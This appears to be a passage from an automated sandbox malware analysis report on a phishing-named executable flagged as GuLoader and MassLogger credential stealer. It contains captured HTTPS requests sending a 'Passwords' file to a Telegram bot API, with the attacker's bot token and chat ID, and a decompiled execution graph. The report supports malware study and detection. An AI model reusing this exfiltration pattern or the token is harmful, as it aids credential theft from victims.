                                                                                                          2024-12-18 08:52:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 35 32 30 62 38 33 39 32 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd21520b83928eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:55 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:54 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:55 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38694,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511974,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.449900149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:58 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd219995a29a71
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-18 08:52:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 39 39 39 35 61 32 39 61 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd219995a29a71Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:59 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:58 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:59 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38695,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511978,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.449912149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:53:01 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd21e0a29bfee3
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-18 08:53:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 65 30 61 32 39 62 66 65 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd21e0a29bfee3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:53:02 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:53:02 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:53:02 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38696,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511982,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.449920149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:53:05 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd2232a3b8a3f5
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-18 08:53:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 33 32 61 33 62 38 61 33 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd2232a3b8a3f5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:53:06 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:53:05 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:53:06 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38697,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511985,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.449931149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:53:08 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd228073636e92
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-18 08:53:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 38 30 37 33 36 33 36 65 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd228073636e92Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:53:09 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:53:09 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:53:09 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38698,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511989,"document":{"file_name":"U


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:03:51:03
                                                                                                          Start date:18/12/2024
                                                                                                          Path:C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:501'968 bytes
                                                                                                          MD5 hash:65EEA9949B624401EA78AAF28072AB3F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2057192020.000000000356F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:03:51:36
                                                                                                          Start date:18/12/2024
                                                                                                          Path:C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:501'968 bytes
                                                                                                          MD5 hash:65EEA9949B624401EA78AAF28072AB3F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:21.4%
                                                                                                            Dynamic/Decrypted Code Coverage:13.9%
                                                                                                            Signature Coverage:20.8%
                                                                                                            Total number of Nodes:1517
                                                                                                            Total number of Limit Nodes:47
                                                                                                            execution_graph 4802 402840 4803 402bbf 18 API calls 4802->4803 4805 40284e 4803->4805 4804 402864 4807 405c05 2 API calls 4804->4807 4805->4804 4806 402bbf 18 API calls 4805->4806 4806->4804 4808 40286a 4807->4808 4830 405c2a GetFileAttributesW CreateFileW 4808->4830 4810 402877 4811 402883 GlobalAlloc 4810->4811 4812 40291a 4810->4812 4815 402911 CloseHandle 4811->4815 4816 40289c 4811->4816 4813 402922 DeleteFileW 4812->4813 4814 402935 4812->4814 4813->4814 4815->4812 4831 403258 SetFilePointer 4816->4831 4818 4028a2 4819 403242 ReadFile 4818->4819 4820 4028ab GlobalAlloc 4819->4820 4821 4028bb 4820->4821 4822 4028ef 4820->4822 4823 403027 32 API calls 4821->4823 4824 405cdc WriteFile 4822->4824 4825 4028c8 4823->4825 4826 4028fb GlobalFree 4824->4826 4828 4028e6 GlobalFree 4825->4828 4827 403027 32 API calls 4826->4827 4829 40290e 4827->4829 4828->4822 4829->4815 4830->4810 4831->4818 4832 10001000 4835 1000101b 4832->4835 4842 10001516 4835->4842 4837 10001020 4838 10001024 4837->4838 4839 10001027 GlobalAlloc 4837->4839 4840 1000153d 3 API calls 4838->4840 4839->4838 4841 10001019 4840->4841 4844 1000151c 4842->4844 4843 10001522 4843->4837 4844->4843 4845 1000152e GlobalFree 4844->4845 4845->4837 4846 401cc0 4847 402ba2 18 API calls 4846->4847 4848 401cc7 4847->4848 4849 402ba2 18 API calls 4848->4849 4850 401ccf GetDlgItem 4849->4850 4851 402531 4850->4851 4852 4029c0 4853 402ba2 18 API calls 4852->4853 4854 4029c6 4853->4854 4855 4029f9 4854->4855 4857 40281e 4854->4857 4858 4029d4 4854->4858 4856 406077 18 API calls 4855->4856 4855->4857 4856->4857 4858->4857 4860 405f9c wsprintfW 4858->4860 4860->4857 4199 403c41 4200 403d94 4199->4200 4201 403c59 4199->4201 4203 403de5 4200->4203 4204 403da5 GetDlgItem GetDlgItem 4200->4204 4201->4200 4202 403c65 4201->4202 4206 403c70 SetWindowPos 4202->4206 4207 403c83 4202->4207 4205 403e3f 4203->4205 4213 401389 2 API calls 4203->4213 4208 404119 19 API calls 4204->4208 4209 404165 SendMessageW 4205->4209 4230 403d8f 4205->4230 4206->4207 4210 403ca0 4207->4210 4211 403c88 ShowWindow 4207->4211 4212 403dcf SetClassLongW 4208->4212 4242 403e51 4209->4242 4214 403cc2 4210->4214 4215 403ca8 DestroyWindow 4210->4215 4211->4210 4216 40140b 2 API calls 4212->4216 4217 403e17 4213->4217 4219 403cc7 SetWindowLongW 4214->4219 4220 403cd8 4214->4220 4218 4040c3 4215->4218 4216->4203 4217->4205 4223 403e1b SendMessageW 4217->4223 4229 4040d3 ShowWindow 4218->4229 4218->4230 4219->4230 4221 403d81 4220->4221 4222 403ce4 GetDlgItem 4220->4222 4279 404180 4221->4279 4226 403d14 4222->4226 4227 403cf7 SendMessageW IsWindowEnabled 4222->4227 4223->4230 4224 40140b 2 API calls 4224->4242 4225 4040a4 DestroyWindow EndDialog 4225->4218 4232 403d21 4226->4232 4233 403d68 SendMessageW 4226->4233 4234 403d34 4226->4234 4244 403d19 4226->4244 4227->4226 4227->4230 4229->4230 4231 406077 18 API calls 4231->4242 4232->4233 4232->4244 4233->4221 4237 403d51 4234->4237 4238 403d3c 4234->4238 4236 403d4f 4236->4221 4240 40140b 2 API calls 4237->4240 4241 40140b 2 API calls 4238->4241 4239 404119 19 API calls 4239->4242 4243 403d58 4240->4243 4241->4244 4242->4224 4242->4225 4242->4230 4242->4231 4242->4239 4260 403fe4 DestroyWindow 4242->4260 4270 404119 4242->4270 4243->4221 4243->4244 4276 4040f2 4244->4276 4246 403ecc GetDlgItem 4247 403ee1 4246->4247 4248 403ee9 ShowWindow KiUserCallbackDispatcher 4246->4248 4247->4248 4273 40413b EnableWindow 4248->4273 4250 403f13 EnableWindow 4253 403f27 4250->4253 4251 403f2c GetSystemMenu EnableMenuItem SendMessageW 4252 403f5c SendMessageW 4251->4252 4251->4253 4252->4253 4253->4251 4274 40414e SendMessageW 4253->4274 4275 406055 lstrcpynW 4253->4275 4256 403f8a lstrlenW 4257 406077 18 API calls 4256->4257 4258 403fa0 SetWindowTextW 4257->4258 4259 401389 2 API calls 4258->4259 4259->4242 4260->4218 4261 403ffe CreateDialogParamW 4260->4261 4261->4218 4262 404031 4261->4262 4263 404119 19 API calls 4262->4263 4264 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4263->4264 4265 401389 2 API calls 4264->4265 4266 404082 4265->4266 4266->4230 4267 40408a ShowWindow 4266->4267 4268 404165 SendMessageW 4267->4268 4269 4040a2 4268->4269 4269->4218 4271 406077 18 API calls 4270->4271 4272 404124 SetDlgItemTextW 4271->4272 4272->4246 4273->4250 4274->4253 4275->4256 4277 4040f9 4276->4277 4278 4040ff SendMessageW 4276->4278 4277->4278 4278->4236 4280 404198 GetWindowLongW 4279->4280 4290 404221 4279->4290 4281 4041a9 4280->4281 4280->4290 4282 4041b8 GetSysColor 4281->4282 4283 4041bb 4281->4283 4282->4283 4284 4041c1 SetTextColor 4283->4284 4285 4041cb SetBkMode 4283->4285 4284->4285 4286 4041e3 GetSysColor 4285->4286 4287 4041e9 4285->4287 4286->4287 4288 4041f0 SetBkColor 4287->4288 4289 4041fa 4287->4289 4288->4289 4289->4290 4291 404214 CreateBrushIndirect 4289->4291 4292 40420d DeleteObject 4289->4292 4290->4230 4291->4290 4292->4291 4293 401fc3 4294 401fd5 4293->4294 4304 402087 4293->4304 4316 402bbf 4294->4316 4296 401423 25 API calls 4302 4021e1 4296->4302 4298 402bbf 18 API calls 4299 401fe5 4298->4299 4300 401ffb LoadLibraryExW 4299->4300 4301 401fed GetModuleHandleW 4299->4301 4303 40200c 4300->4303 4300->4304 4301->4300 4301->4303 4322 40649a WideCharToMultiByte 4303->4322 4304->4296 4307 402056 4311 4051b4 25 API calls 4307->4311 4308 40201d 4309 402025 4308->4309 4310 40203c 4308->4310 4367 401423 4309->4367 4325 10001759 4310->4325 4313 40202d 4311->4313 4313->4302 4314 402079 FreeLibrary 4313->4314 4314->4302 4317 402bcb 4316->4317 4318 406077 18 API calls 4317->4318 4319 402bec 4318->4319 4320 401fdc 4319->4320 4321 4062e9 5 API calls 4319->4321 4320->4298 4321->4320 4323 4064c4 GetProcAddress 4322->4323 4324 402017 4322->4324 4323->4324 4324->4307 4324->4308 4326 10001789 4325->4326 4370 10001b18 4326->4370 4328 10001790 4329 100018a6 4328->4329 4330 100017a1 4328->4330 4331 100017a8 4328->4331 4329->4313 4419 10002286 4330->4419 4402 100022d0 4331->4402 4336 1000180c 4342 10001812 4336->4342 4343 1000184e 4336->4343 4337 100017ee 4432 100024a9 4337->4432 4338 100017d7 4352 100017cd 4338->4352 4429 10002b5f 4338->4429 4339 100017be 4341 100017c4 4339->4341 4346 100017cf 4339->4346 4341->4352 4413 100028a4 4341->4413 4348 100015b4 3 API calls 4342->4348 4344 100024a9 10 API calls 4343->4344 4350 10001840 4344->4350 4345 100017f4 4443 100015b4 4345->4443 4423 10002645 4346->4423 